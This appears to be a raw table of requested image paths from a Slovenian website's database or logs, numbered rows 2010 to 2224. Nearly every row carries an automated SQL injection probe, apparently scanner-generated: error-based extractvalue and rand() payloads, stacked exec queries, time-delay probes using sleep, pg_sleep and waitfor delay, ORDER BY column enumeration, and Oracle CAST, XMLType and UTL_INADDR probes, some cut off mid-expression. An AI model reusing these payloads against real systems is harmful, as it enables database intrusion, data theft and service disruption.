2010. | 1 | balance.gif procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) //slike//stran_1 AND 5486/balance.gif procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) |
2011. | 1 | balance.gif') procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ('agmv'='agmv //slike//stran_1 AND 5486/balance.gif') procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ('agmv'='agmv |
2012. | 1 | balance.gif')) procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and (('qkph'='qkph //slike//stran_1 AND 5486/balance.gif')) procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and (('qkph'='qkph |
2013. | 1 | balance.gif' procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and 'jybn'='jybn //slike//stran_1 AND 5486/balance.gif' procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and 'jybn'='jybn |
2014. | 1 | balance.gif') procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ('omxl' like 'omxl //slike//stran_1 AND 5486/balance.gif') procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ('omxl' like 'omxl |
2015. | 1 | balance.gif%' procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and 'vdnl%'='vdnl //slike//stran_1 AND 5486/balance.gif%' procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and 'vdnl%'='vdnl |
2016. | 1 | balance.gif' procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and 'cbaj' like 'cbaj //slike//stran_1 AND 5486/balance.gif' procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and 'cbaj' like 'cbaj |
2017. | 1 | balance.gif") procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ("ovdw"="ovdw //slike//stran_1 AND 5486/balance.gif") procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ("ovdw"="ovdw |
2018. | 1 | balance.gif" procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and "pimu"="pimu //slike//stran_1 AND 5486/balance.gif" procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and "pimu"="pimu |
2019. | 1 | balance.gif procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1)-- rhfx //slike//stran_1 AND 5486/balance.gif procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1)-- rhfx |
2020. | 1 | (select 8662 from(select count(*),concat(0x7170767171,(select (elt(8662=8662,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_1 AND 5486/(select 8662 from(select count(*),concat(0x7170767171,(select (elt(8662=8662,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
2021. | 1 | balance.gif,(select 7580 from (select row(7580,3139)>(select count(*),concat(0x7170767171,(select (elt(7580=7580,1))),0x716b627671,floor(rand(0)*2))x from (select 5613 union select 6835 union select 1647 union select 9657)a group by x))s) //slike//stran_1 AND 5486/balance.gif,(select 7580 from (select row(7580,3139)>(select count(*),concat(0x7170767171,(select (elt(7580=7580,1))),0x716b627671,floor(rand(0)*2))x from (select 5613 union select 6835 union select 1647 union select 9657)a group by x))s) |
2022. | 1 | balance.gif);declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif);declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2023. | 1 | balance.gif));declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif));declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2024. | 1 | balance.gif;declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif;declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2025. | 1 | balance.gif');declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif');declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2026. | 1 | balance.gif'));declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif'));declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2027. | 1 | balance.gif';declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif';declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2028. | 1 | balance.gif%';declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif%';declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2029. | 1 | balance.gif");declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif");declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2030. | 1 | balance.gif";declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- //slike//stran_1 AND 5486/balance.gif";declare @dotc nvarchar(4000);set @dotc=(select 'qpvqq'+(select (case when (6724=6724) then '1' else '0' end))+'qkbvq');exec @dotc-- |
2031. | 1 | (select concat(concat('qpvqq',(case when (4174=4174) then '1' else '0' end)),'qkbvq')) //slike//stran_1 AND 5486/(select concat(concat('qpvqq',(case when (4174=4174) then '1' else '0' end)),'qkbvq')) |
2032. | 1 | (select concat(0x7170767171,(elt(3966=3966,1)),0x716b627671)) //slike//stran_1 AND 5486/(select concat(0x7170767171,(elt(3966=3966,1)),0x716b627671)) |
2033. | 1 | (select char(113)+char(112)+char(118)+char(113)+char(113)+(case when (6158=6158) then char(49) else char(48) end)+char(113)+char(107)+char(98)+char(118)+char(113)) //slike//stran_1 AND 5486/(select char(113)+char(112)+char(118)+char(113)+char(113)+(case when (6158=6158) then char(49) else char(48) end)+char(113)+char(107)+char(98)+char(118)+char(113)) |
2034. | 1 | balance.gif);select sleep(32)# //slike//stran_1 AND 5486/balance.gif);select sleep(32)# |
2035. | 1 | balance.gif));select sleep(32)# //slike//stran_1 AND 5486/balance.gif));select sleep(32)# |
2036. | 1 | balance.gif;select sleep(32)# //slike//stran_1 AND 5486/balance.gif;select sleep(32)# |
2037. | 1 | balance.gif');select sleep(32)# //slike//stran_1 AND 5486/balance.gif');select sleep(32)# |
2038. | 1 | balance.gif'));select sleep(32)# //slike//stran_1 AND 5486/balance.gif'));select sleep(32)# |
2039. | 1 | balance.gif';select sleep(32)# //slike//stran_1 AND 5486/balance.gif';select sleep(32)# |
2040. | 1 | balance.gif%';select sleep(32)# //slike//stran_1 AND 5486/balance.gif%';select sleep(32)# |
2041. | 1 | balance.gif");select sleep(32)# //slike//stran_1 AND 5486/balance.gif");select sleep(32)# |
2042. | 1 | balance.gif";select sleep(32)# //slike//stran_1 AND 5486/balance.gif";select sleep(32)# |
2043. | 1 | balance.gif);select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif);select pg_sleep(32)-- |
2044. | 1 | balance.gif));select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif));select pg_sleep(32)-- |
2045. | 1 | balance.gif;select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif;select pg_sleep(32)-- |
2046. | 1 | balance.gif');select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif');select pg_sleep(32)-- |
2047. | 1 | balance.gif'));select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif'));select pg_sleep(32)-- |
2048. | 1 | balance.gif';select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif';select pg_sleep(32)-- |
2049. | 1 | balance.gif%';select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif%';select pg_sleep(32)-- |
2050. | 1 | balance.gif");select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif");select pg_sleep(32)-- |
2051. | 1 | balance.gif";select pg_sleep(32)-- //slike//stran_1 AND 5486/balance.gif";select pg_sleep(32)-- |
2052. | 1 | balance.gif);select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif);select count(*) from generate_series(1,32000000)-- |
2053. | 1 | balance.gif));select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif));select count(*) from generate_series(1,32000000)-- |
2054. | 1 | balance.gif;select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif;select count(*) from generate_series(1,32000000)-- |
2055. | 1 | balance.gif');select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif');select count(*) from generate_series(1,32000000)-- |
2056. | 1 | balance.gif'));select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif'));select count(*) from generate_series(1,32000000)-- |
2057. | 1 | balance.gif';select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif';select count(*) from generate_series(1,32000000)-- |
2058. | 1 | balance.gif%';select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif%';select count(*) from generate_series(1,32000000)-- |
2059. | 1 | balance.gif");select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif");select count(*) from generate_series(1,32000000)-- |
2060. | 1 | balance.gif";select count(*) from generate_series(1,32000000)-- //slike//stran_1 AND 5486/balance.gif";select count(*) from generate_series(1,32000000)-- |
2061. | 1 | balance.gif);waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif);waitfor delay '0:0:32'-- |
2062. | 1 | balance.gif));waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif));waitfor delay '0:0:32'-- |
2063. | 1 | balance.gif;waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif;waitfor delay '0:0:32'-- |
2064. | 1 | balance.gif');waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif');waitfor delay '0:0:32'-- |
2065. | 1 | balance.gif'));waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif'));waitfor delay '0:0:32'-- |
2066. | 1 | balance.gif';waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif';waitfor delay '0:0:32'-- |
2067. | 1 | balance.gif%';waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif%';waitfor delay '0:0:32'-- |
2068. | 1 | balance.gif");waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif");waitfor delay '0:0:32'-- |
2069. | 1 | balance.gif";waitfor delay '0:0:32'-- //slike//stran_1 AND 5486/balance.gif";waitfor delay '0:0:32'-- |
2070. | 1 | balance.gif);declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif);declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2071. | 1 | balance.gif));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2072. | 1 | balance.gif;declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif;declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2073. | 1 | balance.gif');declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif');declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2074. | 1 | balance.gif'));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif'));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2075. | 1 | balance.gif';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2076. | 1 | balance.gif%';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif%';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2077. | 1 | balance.gif");declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif");declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2078. | 1 | balance.gif";declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1 AND 5486/balance.gif";declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
2079. | 1 | balance.gif);select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif);select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2080. | 1 | balance.gif));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2081. | 1 | balance.gif;select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif;select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2082. | 1 | balance.gif');select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif');select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2083. | 1 | balance.gif'));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif'));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2084. | 1 | balance.gif';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2085. | 1 | balance.gif%';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif%';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2086. | 1 | balance.gif");select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif");select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2087. | 1 | balance.gif";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1 AND 5486/balance.gif";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
2088. | 1 | balance.gif) order by 1-- qjio //slike//stran_1 AND 5486/balance.gif) order by 1-- qjio |
2089. | 1 | balance.gif) order by 3906-- xkte //slike//stran_1 AND 5486/balance.gif) order by 3906-- xkte |
2090. | 1 | balance.gif)) order by 1-- trxt //slike//stran_1 AND 5486/balance.gif)) order by 1-- trxt |
2091. | 1 | balance.gif)) order by 4903-- uakt //slike//stran_1 AND 5486/balance.gif)) order by 4903-- uakt |
2092. | 1 | balance.gif order by 1-- snlm //slike//stran_1 AND 5486/balance.gif order by 1-- snlm |
2093. | 1 | balance.gif order by 7650-- xste //slike//stran_1 AND 5486/balance.gif order by 7650-- xste |
2094. | 1 | balance.gif') order by 1-- hpqu //slike//stran_1 AND 5486/balance.gif') order by 1-- hpqu |
2095. | 1 | balance.gif') order by 2473-- xbgi //slike//stran_1 AND 5486/balance.gif') order by 2473-- xbgi |
2096. | 1 | balance.gif')) order by 1-- ygrp //slike//stran_1 AND 5486/balance.gif')) order by 1-- ygrp |
2097. | 1 | balance.gif')) order by 2328-- ikyz //slike//stran_1 AND 5486/balance.gif')) order by 2328-- ikyz |
2098. | 1 | balance.gif' order by 1-- fqek //slike//stran_1 AND 5486/balance.gif' order by 1-- fqek |
2099. | 1 | balance.gif' order by 1344-- cpxz //slike//stran_1 AND 5486/balance.gif' order by 1344-- cpxz |
2100. | 1 | balance.gif') order by 1-- sbue //slike//stran_1 AND 5486/balance.gif') order by 1-- sbue |
2101. | 1 | balance.gif') order by 6948-- hkzq //slike//stran_1 AND 5486/balance.gif') order by 6948-- hkzq |
2102. | 1 | balance.gif%' order by 1-- fqip //slike//stran_1 AND 5486/balance.gif%' order by 1-- fqip |
2103. | 1 | balance.gif%' order by 2825-- zmjo //slike//stran_1 AND 5486/balance.gif%' order by 2825-- zmjo |
2104. | 1 | balance.gif' order by 1-- jwwf //slike//stran_1 AND 5486/balance.gif' order by 1-- jwwf |
2105. | 1 | balance.gif' order by 3674-- rsgv //slike//stran_1 AND 5486/balance.gif' order by 3674-- rsgv |
2106. | 1 | balance.gif") order by 1-- nfnw //slike//stran_1 AND 5486/balance.gif") order by 1-- nfnw |
2107. | 1 | balance.gif") order by 6117-- woov //slike//stran_1 AND 5486/balance.gif") order by 6117-- woov |
2108. | 1 | balance.gif" order by 1-- vgaz //slike//stran_1 AND 5486/balance.gif" order by 1-- vgaz |
2109. | 1 | balance.gif" order by 1723-- vosq //slike//stran_1 AND 5486/balance.gif" order by 1723-- vosq |
2110. | 1 | balance.gif order by 1-- idul //slike//stran_1 AND 5486/balance.gif order by 1-- idul |
2111. | 1 | balance.gif order by 1875-- hapi //slike//stran_1 AND 5486/balance.gif order by 1875-- hapi |
2112. | 1 | balance.gif) order by 1# //slike//stran_1 AND 5486/balance.gif) order by 1# |
2113. | 1 | balance.gif) order by 7693# //slike//stran_1 AND 5486/balance.gif) order by 7693# |
2114. | 1 | balance.gif)) order by 1# //slike//stran_1 AND 5486/balance.gif)) order by 1# |
2115. | 1 | balance.gif)) order by 9329# //slike//stran_1 AND 5486/balance.gif)) order by 9329# |
2116. | 1 | balance.gif order by 6391# //slike//stran_1 AND 5486/balance.gif order by 6391# |
2117. | 1 | balance.gif') order by 4643# //slike//stran_1 AND 5486/balance.gif') order by 4643# |
2118. | 1 | balance.gif')) order by 1# //slike//stran_1 AND 5486/balance.gif')) order by 1# |
2119. | 1 | balance.gif')) order by 8510# //slike//stran_1 AND 5486/balance.gif')) order by 8510# |
2120. | 1 | balance.gif' order by 7480# //slike//stran_1 AND 5486/balance.gif' order by 7480# |
2121. | 1 | balance.gif') order by 1067# //slike//stran_1 AND 5486/balance.gif') order by 1067# |
2122. | 1 | balance.gif%' order by 1# //slike//stran_1 AND 5486/balance.gif%' order by 1# |
2123. | 1 | balance.gif%' order by 5675# //slike//stran_1 AND 5486/balance.gif%' order by 5675# |
2124. | 1 | balance.gif' order by 5094# //slike//stran_1 AND 5486/balance.gif' order by 5094# |
2125. | 1 | balance.gif") order by 1# //slike//stran_1 AND 5486/balance.gif") order by 1# |
2126. | 1 | balance.gif") order by 5935# //slike//stran_1 AND 5486/balance.gif") order by 5935# |
2127. | 1 | balance.gif" order by 1# //slike//stran_1 AND 5486/balance.gif" order by 1# |
2128. | 1 | balance.gif" order by 3109# //slike//stran_1 AND 5486/balance.gif" order by 3109# |
2129. | 1 | balance.gif order by 1993# //slike//stran_1 AND 5486/balance.gif order by 1993# |
2130. | 1 | miner.gif' //slike//stran_2/miner.gif' |
2131. | 1 | balance.gif //slike//stran_-9739) OR 3784/balance.gif |
2132. | 1 | balance.gif //slike//stran_1) AND 7846/balance.gif |
2133. | 1 | prepovedano.gif)(..) //slike//stran_5/prepovedano.gif)(..) |
2134. | 1 | forecast.jpg //slike//stran_%27/forecast.jpg |
2135. | 1 | forecast.jpg //slike//stran_2'/forecast.jpg |
2136. | 1 | forecast.jpg' //slike//stran_2/forecast.jpg' |
2137. | 1 | cat-bee.jpg' //slike//stran_2/cat-bee.jpg' |
2138. | 1 | cat-bee.jpg //slike//stran_2'/cat-bee.jpg |
2139. | 1 | %27 //slike//stran_1/%27 |
2140. | 1 | keyboard.jpg //slike//stran_%27/keyboard.jpg |
2141. | 1 | cat-bee.jpg //slike//stran_%27/cat-bee.jpg |
2142. | 1 | znaki.jpg' //slike//znaki.jpg' |
2143. | 1 | pijanec.gif //slike//stran_4'/pijanec.gif |
2144. | 1 | pijanec.gif' //slike//stran_4/pijanec.gif' |
2145. | 1 | 101-102.jpg' //slike//101-102.jpg' |
2146. | 1 | pivo.jpg //slike//stran_2'/pivo.jpg |
2147. | 1 | pivo.jpg' //slike//stran_2/pivo.jpg' |
2148. | | //slike//stran_1) AND (SELECT (CASE WHEN (6808=1163) THEN NULL ELSE CAST((CHR(97)/ |
2149. | | //slike//stran_1) AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2150. | | //slike//stran_1)) AND (SELECT (CASE WHEN (8837=5184) THEN NULL ELSE CAST((CHR(103)/ |
2151. | | //slike//stran_1)) AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2152. | | //slike//stran_1 AND (SELECT (CASE WHEN (9487=9541) THEN NULL ELSE CAST((CHR(80)/ |
2153. | | //slike//stran_1 AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2154. | | //slike//stran_1 AND (SELECT (CASE WHEN (4109=8894) THEN NULL ELSE CAST((CHR(88)/ |
2155. | | //slike//stran_1 AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2156. | | //slike//stran_1') AND (SELECT (CASE WHEN (7274=6194) THEN NULL ELSE CAST((CHR(117)/ |
2157. | | //slike//stran_1') AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2158. | | //slike//stran_1')) AND (SELECT (CASE WHEN (7341=7759) THEN NULL ELSE CAST((CHR(71)/ |
2159. | | //slike//stran_1')) AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2160. | | //slike//stran_1' AND (SELECT (CASE WHEN (8038=5909) THEN NULL ELSE CAST((CHR(86)/ |
2161. | | //slike//stran_1' AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2162. | | //slike//stran_1') AND (SELECT (CASE WHEN (5839=9914) THEN NULL ELSE CAST((CHR(66)/ |
2163. | | //slike//stran_1') AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2164. | | //slike//stran_1%' AND (SELECT (CASE WHEN (4148=8357) THEN NULL ELSE CAST((CHR(112)/ |
2165. | | //slike//stran_1%' AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2166. | | //slike//stran_1' AND (SELECT (CASE WHEN (3478=7234) THEN NULL ELSE CAST((CHR(78)/ |
2167. | | //slike//stran_1' AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2168. | | //slike//stran_1") AND (SELECT (CASE WHEN (2094=7292) THEN NULL ELSE CAST((CHR(114)/ |
2169. | | //slike//stran_1") AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2170. | | //slike//stran_1" AND (SELECT (CASE WHEN (6140=9831) THEN NULL ELSE CAST((CHR(110)/ |
2171. | | //slike//stran_1" AND (SELECT (CASE WHEN (6358=6358) THEN NULL ELSE CAST((CHR(75)/ |
2172. | | //slike//stran_1) AND 3213=CAST((CHR(113)/ |
2173. | | //slike//stran_1)) AND 3213=CAST((CHR(113)/ |
2174. | | //slike//stran_1 AND 3213=CAST((CHR(113)/ |
2175. | | //slike//stran_1 AND 3213=CAST((CHR(113)/ |
2176. | | //slike//stran_1') AND 3213=CAST((CHR(113)/ |
2177. | | //slike//stran_1')) AND 3213=CAST((CHR(113)/ |
2178. | | //slike//stran_1' AND 3213=CAST((CHR(113)/ |
2179. | | //slike//stran_1') AND 3213=CAST((CHR(113)/ |
2180. | | //slike//stran_1%' AND 3213=CAST((CHR(113)/ |
2181. | | //slike//stran_1' AND 3213=CAST((CHR(113)/ |
2182. | | //slike//stran_1") AND 3213=CAST((CHR(113)/ |
2183. | | //slike//stran_1" AND 3213=CAST((CHR(113)/ |
2184. | | //slike//stran_-1957) OR 8985=CAST((CHR(113)/ |
2185. | | //slike//stran_-1002)) OR 8985=CAST((CHR(113)/ |
2186. | | //slike//stran_-7905 OR 8985=CAST((CHR(113)/ |
2187. | | //slike//stran_-2717 OR 8985=CAST((CHR(113)/ |
2188. | | //slike//stran_-2845') OR 8985=CAST((CHR(113)/ |
2189. | | //slike//stran_-7208')) OR 8985=CAST((CHR(113)/ |
2190. | | //slike//stran_-7047' OR 8985=CAST((CHR(113)/ |
2191. | | //slike//stran_-3276') OR 8985=CAST((CHR(113)/ |
2192. | | //slike//stran_-7897%' OR 8985=CAST((CHR(113)/ |
2193. | | //slike//stran_-8224' OR 8985=CAST((CHR(113)/ |
2194. | | //slike//stran_-4209") OR 8985=CAST((CHR(113)/ |
2195. | | //slike//stran_-4675" OR 8985=CAST((CHR(113)/ |
2196. | | //slike//stran_1) AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2197. | | //slike//stran_1)) AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2198. | | //slike//stran_1 AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2199. | | //slike//stran_1 AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2200. | | //slike//stran_1') AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2201. | | //slike//stran_1')) AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2202. | | //slike//stran_1' AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2203. | | //slike//stran_1') AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2204. | | //slike//stran_1%' AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2205. | | //slike//stran_1' AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2206. | | //slike//stran_1") AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2207. | | //slike//stran_1" AND 1704=(SELECT UPPER(XMLType(CHR(60)/ |
2208. | | //slike//stran_-1347) OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2209. | | //slike//stran_-7918)) OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2210. | | //slike//stran_-9492 OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2211. | | //slike//stran_-9768 OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2212. | | //slike//stran_-9123') OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2213. | | //slike//stran_-1477')) OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2214. | | //slike//stran_-4921' OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2215. | | //slike//stran_-8597') OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2216. | | //slike//stran_-3960%' OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2217. | | //slike//stran_-5201' OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2218. | | //slike//stran_-3281") OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2219. | | //slike//stran_-7657" OR 4533=(SELECT UPPER(XMLType(CHR(60)/ |
2220. | | //slike//stran_1) AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2221. | | //slike//stran_1)) AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2222. | | //slike//stran_1 AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2223. | | //slike//stran_1 AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
2224. | | //slike//stran_1') AND 3047=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)/ |
